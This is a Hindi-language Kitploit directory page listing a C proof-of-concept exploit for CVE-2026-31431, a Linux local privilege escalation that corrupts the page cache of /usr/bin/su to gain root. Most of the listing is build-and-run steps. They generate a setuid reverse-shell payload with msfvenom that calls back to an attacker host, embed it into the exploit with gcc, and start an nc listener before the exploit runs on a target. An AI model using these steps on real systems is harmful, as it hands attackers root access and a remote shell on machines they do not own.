Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mcub3/cve-2026-31431
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपेलोड डेवलपमेंटबाइनरी शोषण
GitHubmcub3/cve-2026-31431

CVE-2026-31431

CVE-2026-31431 के लिए C PoC, एक अन-प्रिविलेज्ड Linux LPE जो AF_ALG पेज कैश भ्रष्टाचार का फायदा उठाकर /usr/bin/su को ओवरराइट करता है और रूट प्राप्त करता है।

रिपॉजिटरी देखें
195 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-31431 (कॉपी फेल) — C PoC

किसी भी पठनीय फ़ाइल के पेज कैश में AF_ALG (कर्नेल 4.14 → 2026 की शुरुआत) में एक लॉजिक बग के माध्यम से 4 नियंत्रित बाइट्स लिखकर साधारण अनप्रिविलेज्ड LPE।

/usr/bin/su को मेमोरी में दूषित करें, फिर इसे चलाएँ → रूट।

एक्सप्लॉइट स्क्रीनशॉट

बिल्ड और रन

# 1. एक ELF पेलोड जनरेट करें (रिवर्स शेल उदाहरण)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
    PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86

# 2. कंपाइल करें (स्टैटिक, स्ट्रिप्ड, पेलोड .incbin के माध्यम से एम्बेडेड)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c

# 3. पहले लिसनर शुरू करें (nc -lvp <LPORT>), फिर टार्गेट होस्ट पर एक्सप्लॉइट चलाएँ
./copy_fail_x86

मुख्य विवरण

• CVE: CVE-2026-31431 • CVSS: 7.8 • फिक्स: कमिट a664bf3d603d

• लगभग सभी Linux डिस्ट्रो 2017–2026 पर काम करता है (कंटेनर सहित)।

• तकनीक: /usr/bin/su को O_RDONLY से खोलता है, VFS को बायपास करते हुए सीधे पेज कैश में एक क्राफ्टेड पेलोड को स्प्लाइस करने के लिए AEAD इन-प्लेस डिक्रिप्शन का दुरुपयोग करता है।

• मूल डिस्क्लोज़र और 732-बाइट Python PoC → https://copy.fail

लाइसेंस

MIT – देखें LICENSE। केवल शैक्षिक / अधिकृत परीक्षण के लिए। अपने जोखिम पर उपयोग करें।

टूल डाउनलोड करें